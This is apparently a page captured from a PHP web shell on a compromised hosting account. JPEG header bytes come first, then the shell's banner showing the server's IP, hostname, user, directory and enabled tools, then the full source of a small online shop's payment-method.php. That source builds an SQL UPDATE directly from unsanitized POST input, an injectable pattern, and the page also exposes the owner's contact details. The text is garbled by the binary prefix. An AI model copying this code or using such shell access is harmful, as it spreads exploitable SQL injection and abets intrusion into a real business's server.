����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 162.0.232.25 / Your IP : 3.142.198.250 Web Server : LiteSpeed System : Linux premium276.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : kwacuqig ( 988) PHP Version : 8.2.26 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/kwacuqig/cloudmarketmw.com/ |
Upload File : |
<!-- payment-method.php --> <?php session_start(); error_reporting(0); include('includes/config.php'); if (isset($_POST['submit'])) { mysqli_query($con,"update orders set contactMethod='".$_POST['contact']."' where userId='".$_SESSION['id']."' and contactMethod is null "); unset($_SESSION['cart']); header('location:order-history.php'); } ?> <!DOCTYPE html> <html lang="en"> <head> <!-- Meta --> <meta charset="utf-8"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no"> <meta name="description" content=""> <meta name="author" content=""> <meta name="keywords" content="MediaCenter, Template, eCommerce"> <meta name="robots" content="all"> <title>cloud market mw | contancts</title> <link rel="stylesheet" href="assets/css/bootstrap.min.css"> <link rel="stylesheet" href="assets/css/main.css"> <link rel="stylesheet" href="css/sty.css"> <link rel="stylesheet" href="assets/css/font-awesome.min.css"> <link href='http://fonts.googleapis.com/css?family=Roboto:300,400,500,700' rel='stylesheet' type='text/css'> <link rel="stylesheet" href="assets/css/blue.css"> <link rel="stylesheet" href="css/new.css"> <link rel="shortcut icon" href="img/Logo.png"> </head> <body class="cnt-home"> <header class="header-style-1"> <?php include('includes/top-header.php');?> <?php include('includes/main-header.php');?> <?php include('includes/menu-bar.php');?> </header> <div class="body-content outer-top-bd"> <div class="container"> <div class="checkout-box faq-page inner-bottom-sm"> <div class="row"> <div class="col-md-12"> <h2 class="spac">Choose contact Method</h2> <h3 class="spac">click on icons below</h3> <div class="panel-group checkout-steps" id="accordion"> <ul> <div class="conts" > <div class="conts"> <a href="phonenumbers.php"><img src="icons/images.png" alt="" width="50" height="50" class="spacing"><a> <a href="https://wa.me/+265897827840"><img src="icons/image.png" alt="" width="50" height="50" class="spacing"> </a> <a href="http://www.facebook.com/cloudemarketmw"><img src="icons/icon (1).png" alt="" width="50" height="50" class="spacing"> </a> <a href="mailto:cloudemarketmw@gmail.com?subject=Buying a Product on cloud market Mw"> <img src="icons/icon.png" alt="" width="50" height="50" class="spacing"> </a> </div> </div> <div > </div> </ul> </div><!-- /.checkout-steps --> </div> </div><!-- /.row --> </div><!-- /.checkout-box --> </div><!-- /.body-content --> <?php include('includes/footer.php');?> </body> </html>